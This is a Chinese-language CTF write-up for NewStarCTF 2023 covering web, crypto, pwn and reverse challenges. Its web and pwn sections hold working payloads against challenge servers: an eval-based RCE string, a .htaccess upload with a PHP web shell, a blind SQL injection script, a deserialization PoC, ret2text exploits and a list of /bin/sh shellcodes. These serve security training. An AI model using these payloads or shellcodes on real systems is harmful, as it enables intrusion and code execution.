NewStarCTF 2023 公开赛道 WEEK1

web

WEEK1|WEB 泄漏的秘密

http://cd98ca4d-7c72-4499-9cb1-010764aa19de.node4.buuoj.cn:81/robots.txt

http://cd98ca4d-7c72-4499-9cb1-010764aa19de.node4.buuoj.cn:81/www.zip
PART ONE: flag{r0bots_1s_s0_us3ful
$PART_TWO = “_4nd_www.zip_1s_s0_d4ng3rous}";

WEEK1|WEB Begin of Upload

前端拦截
image-20220126203415648

WEEK1|WEB Begin of HTTP

http://node4.buuoj.cn:29356/?ctf=1
base64_decode(bjN3c3Q0ckNURjIwMjNnMDAwMDBk
改一下cookie

image-20220126203415648

WEEK1|WEB ErrorFlask

http://e8e7a85b-f054-4efa-8acd-d609723abc02.node4.buuoj.cn:81/?number1=49&number2=2
随便传个参数,源码泄露
image-20220126203415648

WEEK1|WEB Begin of PHP

代码很长,都是基础的

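<?php
// Listing reconstructed from the writeup: the `=` of each `$flagN = True;`
// assignment was lost in extraction and is restored here; the checks are
// otherwise unchanged.
error_reporting(0);
highlight_file(__FILE__);

// Level 1: `==` between two md5() hex strings is a loose comparison, so two
// digests of the form "0e<digits>" compare as equal numbers (both 0) even
// though the inputs differ. Mitigation: `===` or hash_equals() on digests.
if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

// Level 2: before PHP 8, md5() and sha1() both return NULL (with a warning)
// when given an array instead of a string, so a non-string key3 satisfies
// `===`. Mitigation: reject non-string input (is_string) before hashing.
if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

// Level 3: before PHP 8, strcmp() given an array returns NULL, and NULL == 0.
// Mitigation: is_string() check plus a strict `=== 0` comparison.
if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){  // writeup note: bypassed by passing an array
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

// Level 4: `>` on a non-numeric string is a loose comparison and does not
// require the value to be a number. Mitigation: validate/cast to int first.
if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

// Level 5: extract($_POST) turns every request field into a local variable,
// so $flag5 itself is client-controlled, and the filter only rejects ASCII
// letters and digits. Mitigation: never extract() request data.
if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach($_POST as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}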
http://e9f2544c-4f0e-400c-b5d2-0aa335160abb.node4.buuoj.cn:81/?key1=QNKCDZO&key2=240610708&key4[]=1&key5=2222c
post:key3[]=1&flag5=%CE

WEEK1|WEB R!C!E!
<?php
highlight_file(__FILE__);
// Both POST fields are required. Only the first six hex digits of the
// password's MD5 are checked, and the submitted code reaches eval() as soon
// as it avoids the five blacklisted words (matched case-insensitively).
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){
    $digest = md5($_POST['password']);
    $snippet = $_POST['e_v.a.l'];
    if(substr($digest,0,6)==="c4d038" && !preg_match("/flag|system|pass|cat|ls/i",$snippet)){
        eval($snippet);
    }
}

有个小密码,用python爆破一下

import hashlib
import binascii
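def mohu_md5(prefix="c4d038", limit=1300000):
    """Scan the decimal strings "1" .. str(limit - 1) for one whose MD5 hex
    digest starts with *prefix*, print the first hit and return it.

    The challenge only compares substr(md5($password), 0, 6), i.e. 24 bits
    of the digest, which is why a short linear scan is enough.

    Args:
        prefix: lowercase hex prefix the digest must start with (the
            challenge's value by default).
        limit: exclusive upper bound of the scan.

    Returns:
        The matching decimal string, or None if the scan is exhausted
        (the original printed the hit and returned nothing).
    """
    width = len(prefix)
    for number in range(1, limit):
        candidate = str(number)
        digest = hashlib.md5(candidate.encode("utf-8")).hexdigest()
        if digest[:width] == prefix:
            print(candidate + "----->" + digest)
            return candidate
    return None
mohu_md5()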

#114514----->c4d038b4bed09fdb1471ef51ec3a32cd

`$_POST['e_v.a.l']` 这个 eval 参数在传参的时候,要把参数名里的 `_` 换成 `[`,
post:
password=114514&e[v.a.l=eval($_POST['a']);&a=system('cat /flag');

WEEK1|WEB EasyLogin

admin爆破即可,加一下md5
image-20220126203415648

WEEK2|WEB 听说你是游戏高手?

看一下源码,大于100000000即可,json传参

image-20220126203415648image-20220126203415648

WEEK2|WEB include 0。0
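<?php
highlight_file(__FILE__);
// FLAG in the flag.php
// Listing reconstructed: the `=` of the assignment below was lost in
// extraction and is restored; nothing else is changed.
$file = $_GET['file'];
// A keyword blacklist on the wrapper string does not limit what include()
// can open: other php://filter conversions (the writeup uses convert.iconv)
// still read arbitrary files. An allow-list of includable files is the fix.
if(isset($file) && !preg_match('/base|rot/i',$file)){
    @include($file);
}else{
    die("nope");
}
?>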
nope

任意文件读取,过滤了 base 和 rot,可以用 php://filter 的其他转换过滤器(如下面的 convert.iconv)
http://a9e88e4f-6a32-485c-a733-fd09df8be832.node4.buuoj.cn:81/?file=php://filter/read=convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php
得到的东西再转回去即可

<?php
// The file was read through convert.iconv.UCS-2LE.UCS-2BE, which swaps each
// pair of bytes; converting in the opposite direction restores the text.
$swapped = "?<hp p//lfga4{2eb4dc-ece724-61-56a454-2c408bdd68}a";
echo iconv('UCS-2BE', 'UCS-2LE', $swapped);
WEEK2|WEB Unserialize?

反序列化,private变量被序列化时会产生\x00,要注意url编码
过滤了常用的查看命令,用 nl 代替

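<?php
highlight_file(__FILE__);
// Maybe you need learn some knowledge about deserialize?
// Listing reconstructed: the comma between the two preg_match() arguments
// was lost in extraction and is restored; nothing else is changed.
class evil {
    private $cmd;

    // Runs when the object is destroyed, which includes objects created by
    // unserialize() from request data: the private property is populated
    // from the payload, so the word blacklist is the only control before
    // system(). Mitigation: never unserialize untrusted input (use JSON, or
    // at least allowed_classes => false).
    public function __destruct()
    {
        if(!preg_match("/cat|tac|more|tail|base/i", $this->cmd)){
            @system($this->cmd);
        }
    }
}

@unserialize($_POST['unser']);
?>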

poc:

<?php
// Emits the URL-encoded serialized form of an `evil` object. Private
// members serialize with \0-delimited names, which is why the output is
// urlencode()d before being pasted into a request.
class evil {
    private $cmd = "nl /th1s_1s_fffflllll4444aaaggggg";

    public function __destruct()
    {
        if(!preg_match("/cat|tac|more|tail|base/i", $this->cmd)){
            @system($this->cmd);
        }
    }
}

echo urlencode(serialize(new evil()));
WEEK2|WEB ez_sql

sql注入,盲注
poc

import requests



# Keywords and characters probed one at a time; a 'no!' in the response
# means the server-side blacklist rejected that token.
sql_char = [
    'select', 'union', 'and', 'or', 'sleep', 'where', 'from', 'limit',
    'group', 'by', 'like', 'prepare', 'as', 'if', 'char', 'ascii', 'mid',
    'left', 'right', 'substring', 'handler', 'updatexml', 'extractvalue',
    'benchmark', 'insert', 'update', 'all',
    '@', '#', '^', '&', '*', '\'', '"', '~', '`', '(', ')', '--', '=', '/',
    '\\', ' ',
]

base_url = "http://1f2edf21-fa95-4d74-8410-ad4faffbfb07.node4.buuoj.cn:81/?id=TMP0929"

for token in sql_char:
    # Append the probe to a known-good id and classify by the error marker.
    reply = requests.get(base_url + token)
    verdict = "该字符是非法字符: {0}" if 'no!' in reply.text else "通过: {0}"
    print(verdict.format(token))
   




# 导入所需模块

import requests

import string

import time



# 构造字母表,根据字母表去爆破每一位的具体值

alphabet = string.ascii_letters + string.digits + "-,}{_="
print(alphabet)

# Challenge URL; the id value is one that renders a normal page.
url = "http://8c704eaf-a795-49b7-9951-a7b2f4811142.node4.buuoj.cn:81/?id=TMP0929"

# Sub-query of interest. Each reassignment records one stage the author went
# through; only the last value survives, and the payload below hard-codes the
# final query anyway, so `select` is not otherwise used.
select = "select database()"
select = "select group_concat(table_name) from information_schema.tables where table_schema=database()"  # stage 1
select = "select group_concat(table_name) from information_schema.tables where table_schema='ctf'"  # stage 2
select = "select group_concat(column_name) from information_schema.columns where table_schema='ctf' and table_name='here_is_flag'"  # stage 3
select = "select flag from ctf.here_is_flag"

result = ""  # characters recovered so far, in order

for position in range(1, 100):  # substr() positions are 1-based
    for ch in alphabet:
        # One boolean probe per candidate: the page contains "class_name"
        # only when the guessed character is the right one.
        payload = f"' AND subStr((SELECT flag FROM here_is_flag) ,{position},1) = '{ch}' AND 'YSGl'='YSGl"
        r = requests.get(url=url + payload)
        if ord(ch) < 66:  # the host rate-limits (HTTP 429); back off on these candidates
            time.sleep(3)
        if "class_name" not in r.text:
            continue
        result += ch
        print("注入成功:", result)
        print(url + payload)
        break  # this position is settled; go on to the next one
    # When no candidate matches, the value has most likely ended (or the
    # payload is wrong). The original left the early exit commented out, so
    # the outer loop simply runs on to position 99.

image-20220126203415648

WEEK2|WEB Upload again!

白名单校验,直接传 .htaccess,再包含即可

filename=".htaccess"
Content-Type: application/octet-stream

AddType application/x-httpd-php .jpg


GIF89a
<script language="php">eval($_POST['g']);</script>

image-20220126203415648

WEEK2|WEB R!!C!!E!!

扫描目录得到git泄露,访问/.git/index得到源码,打开乱码,不过可以看到bo0g1pop.php
image-20220126203415648
访问一下,无参数rce

1
2
3
4
5
6
7
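<?php
highlight_file(__FILE__);
// Listing reconstructed: the `, '', ` between the preg_replace() arguments
// was lost in extraction and is restored. The pattern strips nested
// parameterless calls such as f(g()) and requires nothing but `;` to remain.
if (';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['star'])) {
    // A function-name blacklist leaves every other callable available, so
    // this is still code execution on request data; the only safe form is
    // no eval() of user input at all.
    if(!preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i',$_GET['star'])){
        eval($_GET['star']);
    }
}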

这里没有过滤getallheaders,直接用这个
GET /bo0g1pop.php?star=print_r(getallheaders());
先输出所有的header
image-20220126203415648

end() - 将内部指针指向数组中的最后一个元素,并输出。
next() - 将内部指针指向数组中的下一个元素,并输出。
prev() - 将内部指针指向数组中的上一个元素,并输出。
reset() - 将内部指针指向数组中的第一个元素,并输出。
each() - 返回当前元素的键名和键值,并将内部指针向前移动。
current() -输出数组中的当前元素的值。

然后从上面这些数组指针函数里挑一个没有被 ban 的,这里用 next
image-20220126203415648
可以看到输出了 UA,那就通过 UA 传参,把 print 改成 eval 即可
/bo0g1pop.php?star=eval(next(getallheaders()));
image-20220126203415648
image-20220126203415648

WEEK1|CRYPTO brainfuck

随波逐流即可
image-20220126203415648

WEEK1|CRYPTO Caesar’s Secert

image-20220126203415648

WEEK1|CRYPTO Fence

image-20220126203415648

WEEK1|CRYPTO Vigenère

https://www.guballa.de/vigenere-solver
image-20220126203415648

WEEK1|CRYPTO babyencoding

base64
image-20220126203415648
base32
image-20220126203415648
uuencode
http://www.atoolbox.net/Tool.php?Id=731
image-20220126203415648

WEEK1|CRYPTO Small d
from secret import flag
from Crypto.Util.number import *

p = getPrime(1024)
q = getPrime(1024)

d = getPrime(32)
e = inverse(d, (p-1)*(q-1))
n = p*q
m = bytes_to_long(flag)

c = pow(m,e,n)

print(c)
print(e)
print(n)

# c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
# e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
# n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433

e很大,维纳攻击
image-20220126203415648

WEEK1|CRYPTO babyrsa
from Crypto.Util.number import *
from flag import flag

def gen_prime(n):
res = 1

for i in range(15):
res *= getPrime(n)

return res


if __name__ == '__main__':
n = gen_prime(32) #32位n
e = 65537
m = bytes_to_long(flag)
c = pow(m,e,n)
print(n)
print(c)
# 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
# 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595

将n进行分解
image-20220126203415648
根据代码得到,n 是 15 个素数相乘得来的,那么 fn 就是所有素数各减 1 后相乘

  

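# Standard library only: pow(e, -1, phi) (Python 3.8+) gives the modular
# inverse and int.to_bytes() converts the recovered integer, so the unused
# distutils import (module removed in Python 3.12) and the gmpy2 / libnum
# dependencies are dropped.

# The 15 32-bit prime factors of the published modulus.
p = 2217990919
q = 2338725373
r3 = 2370292207
r4 = 2463878387
r5 = 2706073949
r6 = 2794985117
r7 = 2804303069
r8 = 2923072267
r9 = 2970591037
r10 = 3207148519
r11 = 3654864131
r12 = 3831680819
r13 = 3939901243
r14 = 4093178561
r15 = 4278428893
factors = (p, q, r3, r4, r5, r6, r7, r8, r9, r10, r11, r12, r13, r14, r15)

c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595

# n is square-free, so Euler's totient is the product of (factor - 1).
n = 1
fn = 1
for prime in factors:
    n *= prime
    fn *= prime - 1

e = 65537

# Private exponent: the multiplicative inverse of e modulo phi(n).
d = pow(e, -1, fn)
print(d)

m = pow(c, d, n)
print(m)

# Big-endian byte string of m (the same bytes libnum.n2s() produced).
print(m.to_bytes((m.bit_length() + 7) // 8, "big"))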
WEEK1|CRYPTO babyxor
# from secret import *
# ciphertext = []
# for f in flag:
#     ciphertext.append(f ^ key)
# print(bytes(ciphertext).hex())

# e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2

import  binascii

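s = "e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2"

s = binascii.unhexlify(s)

# A single-byte XOR key falls out of one known plaintext byte: the flag
# starts with 'f', so key = s[0] ^ ord('f'). The original searched j in
# range(255) inside a loop over every position, printing the same key
# len(s) times and never trying 255; one XOR replaces all of that.
key = s[0] ^ ord('f')
print(key)  # 143 for this ciphertext

# XOR is its own inverse: apply the key to every byte.
plaintext = "".join(chr(byte ^ key) for byte in s)
print(plaintext, end="")
# flag{x0r_15_symm3try_and_e4zy!!!!!!}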
WEEK1|CRYPTO Vigenère
# from flag import flag, key
# modulus = 256
# ciphertext = []


# for f in flag:
#     ciphertext.append((key[0]*f + key[1]) % modulus)

# print(bytes(ciphertext).hex())

import binascii

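modulus = 256

s = "dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064"

s = binascii.unhexlify(s)

# Recover the affine key (a, b) from the known prefix "fla": every pair that
# maps 'f', 'l', 'a' onto the first three ciphertext bytes is printed.
for i in range(256):
    for j in range(256):
        if (i*ord('f') + j) % modulus == s[0] and (i*ord('l') + j) % modulus == s[1] and (i*ord('a') + j) % modulus == s[2]:
            print(i, j)

a, b = 17, 23

# Invert byte by byte: the k with (a*k + b) % 256 == c is the plaintext byte.
# The original searched range(255), which silently dropped any byte whose
# plaintext was 255; range(256) covers the whole byte space.
flag = ''
for cipher_byte in s:
    for k in range(256):
        if (a*k + b) % 256 == cipher_byte:
            flag += chr(k)
            break

print(flag)

#flag{4ff1ne_c1pher_i5_very_3azy}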

根据源码知道,每个字符满足 (a*flag + b) % 256 = c,那么列个方程解出 a、b,再带回去逐字符求逆即可。

WEEK1|PWN ret2text

  /pwn/xinshengsai ❯ checksec ret2text ✘ INT  1m 16s root@Bohemian  11:08:48
[] Checking for new versions of pwntools
To disable this functionality, set the contents of /root/.cache/.pwntools-cache-3.8/update to ‘ever’ (old way).
Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
[update]
interval=never
[
] A newer version of pwntools is available on pypi (4.8.0 –> 4.11.0).
Update with: $ pip install -U pwntools
[*] ‘/pwn/xinshengsai/ret2text’
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
没有开 canary 和 PIE
image-20220126203415648
拖到ida有binbash,
image-20220126203415648
溢出的偏移是 0x20+8
poc:

from pwn import *


#p = process("./pwn")
p = remote("node4.buuoj.cn", 29481)
backdoor = 0x401212  # address read from the disassembly; fixed because the binary has no PIE
# 0x20 bytes of buffer plus 8 bytes of saved rbp precede the return address,
# which is overwritten with the backdoor.
filler = b'a' * (0x20 + 8)
payload = filler + p64(backdoor)

p.sendline(payload)
p.interactive()

WEEK1|PWN Vigenère

poc

from pwn import *


#p = process("./pwn")

p= remote("node4.buuoj.cn",26857)


from pwn import*
# NOTE(review): arch is set to i386 here, but the bytes sent below are the
# 22-byte stub listed further down the page under the 64-bit heading; the
# setting only affects shellcraft/asm (the unused `shellcode`), not the raw
# payload — confirm the target is amd64.
context(log_level = 'debug', arch = 'i386', os = 'linux')
# Raw stub sent as-is (see the "64位 scanf可读取的shellcode 22字节" entry below).
payload = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05'
shellcode=asm(shellcraft.sh())  # assembled per the context above, but never sent

#p.recvuntil("Welcome!May I have your name?\n")

p.sendline(payload)
#p.sendline('cat flag')
#p.recvline(keepends=True)
#p.recvline(keepends=True)
#s = p.recv(numb = 2048, timeout = 3)
#sp = p.recv(numb = 5048, timeout = 3)
#print(sp)
p.interactive()

相关shellcode,https://blog.csdn.net/Xzzzz911/article/details/133468714
# 32位 短字节shellcode --> 21字节
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

# 32位 纯ascii字符shellcode
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA

# 32位 scanf可读取的shellcode
\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh

# 64位 scanf可读取的shellcode 22字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05

# 64位 较短的shellcode 23字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

# 64位 纯ascii字符shellcode
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t
WEEK1|PWN p1eee

溢出偏移 0x20+8
image-20220126203415648
bash 地址 0x126c
image-20220126203415648
poc:


from pwn import *
#p = process("./pwn6")
p = remote("node4.buuoj.cn", 26148)
backdoor = 0x126C  # offset read from the disassembly (see the screenshot above)
# 0x20 bytes of buffer plus 8 bytes of saved rbp, then the return address.
payload = b'a' * (0x20 + 8) + p64(backdoor)

p.sendline(payload)
p.interactive()
WEEK1|REVERSE easy_RE

shift+f12看一下字符串,搜一下flag,有一个
image-20220126203415648
image-20220126203415648

WEEK1|REVERSE 咳

使用pe查一下
https://github.com/ExeinfoASL/ASL/tree/master

image-20220126203415648
upx的壳,
upx -d file即可,然后拖到ida中,看到关键函数,对str1-1操作等于enc,双击enc,得到字符串
image-20220126203415648
image-20220126203415648
gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~,
poc:

a = "gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~"

# Each stored character is one code point above the original, so stepping
# every character back by one recovers the text (printed without a newline).
decoded = "".join(chr(ord(ch) - 1) for ch in a)
print(decoded, end="")
WEEK1|REVERSE Segments

 Action    name: ShowSegments

This command opens the segments window. The format of this window is explained here.

You can use list viewer commands in this window.

In order to change the selector values, use selectors window. 

中文翻译如下:

操作名称:ShowSegments

此命令打开段窗口。该窗口的格式在此处解释。

您可以在此窗口中使用列表查看器命令。

要更改选择器值,请使用选择器窗口。
提示了,shift+f7即可,看到
image-20220126203415648

WEEK1|REVERSE ELF

image-20220126203415648
for ( i = 0; i < strlen(a1); ++i )
{
v2 = v6++;
v4[v2] = (a1[i] ^ 0x20) + 16;
}
给每一个字符异或 0x20,然后加上 16
image-20220126203415648
然后base64,
那么逆向的话就是先解 base64,然后减 16,再异或 0x20

  import base64

a = "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t"

s = base64.b64decode(a)

# Undo the two steps in reverse order: the binary XORed each byte with 0x20
# and then added 16, so subtract 16 first and XOR afterwards.
recovered = "".join(chr((byte - 16) ^ 0x20) for byte in s)
print(recovered, end="")

#flag{D0_4ou_7now_wha7_ELF_1s?}

WEEK1|REVERSE Endian
  puts("please input your flag");
__isoc99_scanf("%s");
v5 = &v6;
for ( i = 0; i <= 4; ++i )
{
if ( *(_DWORD *)v5 != (array[i] ^ 0x12345678) )//数组和这个12345678亦或
{
printf("wrong!");
exit(0);
}
v5 += 4;
}
printf("you are right");
return 0;
双击array,有一个数组
.rodata:0000000000002010 array dd 75553A1Eh, 7B583A03h, 4D58220Ch, 7B50383Dh, 736B3819h

image-20220126203415648
写个脚本,处理一下


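# Standard library only: int.to_bytes() replaces Crypto.Util.number's
# long_to_bytes, so the pycryptodome import is dropped; the unused `sums`
# counter is gone too.

# The decompiled check compares each 4-byte chunk of the input with
# array[i] ^ 0x12345678, so undoing the XOR and emitting every dword as
# exactly four little-endian bytes reconstructs the expected input.
# (long_to_bytes(x)[::-1] would silently drop a chunk's leading zero byte.)
a = "75553A1E, 7B583A03, 4D58220C, 7B50383D, 736B3819"

a = a.split(", ")

pieces = []
for word in a:
    chunk = (int(word, 16) ^ 0x12345678).to_bytes(4, "little")
    pieces.append(chunk)
    print(str(chunk), end="")

    #b'flag'b'{lli'b'ttl_'b'Endi'b'an_a'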
 
WEEK1|REVERSE AndroXor

image-20220126203415648
拖到Androidkill中,看到代码
也就是每个字符与 happyx3 按位异或,key 不够长时循环使用即可,
poc:

key = "happyx3"

s = "14, 13, 17, 23, 2, 75, 73, 55, 32, 30, 20, 73, 10, 2, 12, 62, 40, 64, 11, 39, 75, 89, 25, 65, 13 "

index = 0

s = s.split(", ")

for i in range(len(s)):

    print(chr(int(s[i])^ord((key[i%7]))), end="")
WEEK1|REVERSE EzPE

文件打不开,看一下文件十六进制头,exe的文件头为4D5A90,改一下
image-20220126203415648
https://thunderjie.github.io/2019/03/27/PE%E7%BB%93%E6%9E%84%E8%AF%A6%E8%A7%A3/
再将90 改成80

在 IDA 中选中数据后按 shift + e 导出

lis = [0x0A, 0x0C, 0x04, 0x1F, 0x26, 0x6C, 0x43, 0x2D, 0x3C, 0x0C,
       0x54, 0x4C, 0x24, 0x25, 0x11, 0x06, 0x05, 0x3A, 0x7C, 0x51,
       0x38, 0x1A, 0x03, 0x0D, 0x01, 0x36, 0x1F, 0x12, 0x26, 0x04,
       0x68, 0x5D, 0x3F, 0x2D, 0x37, 0x2A, 0x7D]

# Walk from the second-to-last element back to the first. Each value is
# unmasked with its own index and the (already unmasked) element after it,
# so the order must be descending; lis[36] is left untouched. The list is
# printed after every step, exactly as the original did.
for pos in reversed(range(36)):
    lis[pos] ^= pos ^ lis[pos + 1]
    print(lis)
WEEK1|REVERSE lazy_activtiy

拖到andkill里直接搜flag

image-20220126203415648